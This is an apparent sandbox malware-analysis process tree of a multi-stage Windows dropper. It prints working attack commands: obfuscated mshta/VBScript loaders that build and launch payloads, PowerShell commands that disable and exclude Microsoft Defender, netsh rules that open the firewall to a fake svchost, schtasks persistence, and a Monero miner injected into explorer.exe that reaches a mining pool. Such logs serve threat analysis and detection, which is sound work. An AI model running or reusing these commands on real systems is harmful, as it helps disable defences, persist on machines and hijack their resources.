C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R typE "C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE" > ..\F44LQM.eXE && Start ..\f44LQm.eXE /PsV~zGbxsNCn0ht2 &iF "/PsV~zGbxsNCn0ht2 " == "" for %i in ("C:\Users\Admin\AppData\Local\Temp\F44LQM.eXE") do taskkill /IM "%~nXi" /f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScriPT: CLOSe (CrEateoBJEcT("wscRIPt.shElL"). ruN( "CMd /c eCHO i2l%dAte%xMAM> 5104y14.R4 & ecHO | SEt /P = ""MZ"" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP + 5104y14.R4 ..\3U_2.OI& deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI " , 0 , TRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHO i2lÚte%xMAM> 5104y14.R4 &ecHO | SEt /P = "MZ" > QDV9E5X.S &Copy /B /Y QDV9E5X.S + I2U1lN.HIP + YZBKn5nE.w5T + p5tS4.L + GO8yZV.FP +5104y14.R4 ..\3U_2.OI& deL /Q *& STarT msiexec.exe /Y ..\3U_2.OI10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>QDV9E5X.S"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\3U_2.OI11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Mon11c267c861c0984e.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11cd46e0d889458.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11cd46e0d889458.exeMon11cd46e0d889458.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\8070241.exe"C:\ProgramData\8070241.exe"8⤵
-
C:\ProgramData\1355166.exe"C:\ProgramData\1355166.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\6169518.exe"C:\ProgramData\6169518.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\1715481.exe"C:\ProgramData\1715481.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Pro.exe"C:\Users\Admin\AppData\Local\Temp\Pro.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-HCI1T.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HCI1T.tmp\setup.tmp" /SL5="$20264,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GO73C.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GO73C.tmp\setup.tmp" /SL5="$10422,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-R02EC.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-R02EC.tmp\postback.exe" ss111⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5232 -s 16968⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\EASS.exe"C:\Users\Admin\AppData\Local\Temp\EASS.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EASS.exe"C:\Users\Admin\AppData\Local\Temp\EASS.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 10529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 2768⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\9.exe"C:\Users\Admin\AppData\Local\Temp\9.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11a22bde2b.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11a22bde2b.exeMon11a22bde2b.exe /mixone5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 2806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1124e978ea57bf.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1124e978ea57bf.exeMon1124e978ea57bf.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"C:\Users\Admin\Pictures\Adobe Films\79bdtvSpzzQK8f1KkdyOR7P4.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\0knn9mY0l5PQHp4gWsjZSlpS.exe"C:\Users\Admin\Pictures\Adobe Films\0knn9mY0l5PQHp4gWsjZSlpS.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\q1qArhKu7efjajBNmy5h0n8M.exe"C:\Users\Admin\Pictures\Adobe Films\q1qArhKu7efjajBNmy5h0n8M.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\HGnD7vZ80Dldb3sA9NYHS6wO.exe"C:\Users\Admin\Pictures\Adobe Films\HGnD7vZ80Dldb3sA9NYHS6wO.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 2327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\xuxy0m26qkl1ozW_XcqhZr0B.exe"C:\Users\Admin\Pictures\Adobe Films\xuxy0m26qkl1ozW_XcqhZr0B.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"C:\Users\Admin\Pictures\Adobe Films\BPB6ZJQKq01MUb8AG050pNjq.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\4mulY6HX0OKjNh4y5va_iEdo.exe"C:\Users\Admin\Pictures\Adobe Films\4mulY6HX0OKjNh4y5va_iEdo.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose8⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 08⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 68⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 28⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\sbvc.exe"C:\Users\Admin\AppData\Local\Temp\sbvc.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 2327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"C:\Users\Admin\Pictures\Adobe Films\WQ_0DNHwegoB5QOHvlIZntSr.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xWDw4KvnprXoiUalqAVdu3zs.exe"C:\Users\Admin\Pictures\Adobe Films\xWDw4KvnprXoiUalqAVdu3zs.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\agoAaS1E4vcti_WnSeLXTsWt.exe"C:\Users\Admin\Pictures\Adobe Films\agoAaS1E4vcti_WnSeLXTsWt.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\AppData\Roaming\League.exe"C:\Users\Admin\AppData\Roaming\League.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\brLy3TAdoOEVkJuOS7U49MCH.exe"C:\Users\Admin\Pictures\Adobe Films\brLy3TAdoOEVkJuOS7U49MCH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe"C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\F43iLKlK4O0w6ezlpvjg0cbo.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe"C:\Users\Admin\Pictures\Adobe Films\JgYRm3l3lVYIu3OxbT9SrtZC.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 10527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"C:\Users\Admin\Pictures\Adobe Films\QPeacnpa5OCyBgRir69RuR8o.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\shHTGmNy_HRzMNn3G5hYc3B7.exe"C:\Users\Admin\Documents\shHTGmNy_HRzMNn3G5hYc3B7.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\MxvrNj70D3P6L2I1AAwfyiBI.exe"C:\Users\Admin\Pictures\Adobe Films\MxvrNj70D3P6L2I1AAwfyiBI.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\tDQQVMK4kh5kC_VXdu6mwGw2.exe"C:\Users\Admin\Pictures\Adobe Films\tDQQVMK4kh5kC_VXdu6mwGw2.exe" /mixtwo8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\K0j8f5iqbfnfHvcNjJcr34Ek.exe"C:\Users\Admin\Pictures\Adobe Films\K0j8f5iqbfnfHvcNjJcr34Ek.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 17529⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\4Uf7hX9wKWamDH8f4X0RB_qb.exe"C:\Users\Admin\Pictures\Adobe Films\4Uf7hX9wKWamDH8f4X0RB_qb.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 2729⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Y9cwGigB6qwOuguftOmpB8FC.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Y9cwGigB6qwOuguftOmpB8FC.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\As_7_fJ9jiliYff_bkd0HLSb.exe"C:\Users\Admin\Pictures\Adobe Films\As_7_fJ9jiliYff_bkd0HLSb.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ugEsHRx54YV5ePchkNJT6lmN.exe"C:\Users\Admin\Pictures\Adobe Films\ugEsHRx54YV5ePchkNJT6lmN.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"10⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --mojo-platform-channel-handle=2004 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2688 /prefetch:111⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,15814516980960893704,15312985118942099677,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7900_1361415170" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2680 /prefetch:111⤵
-
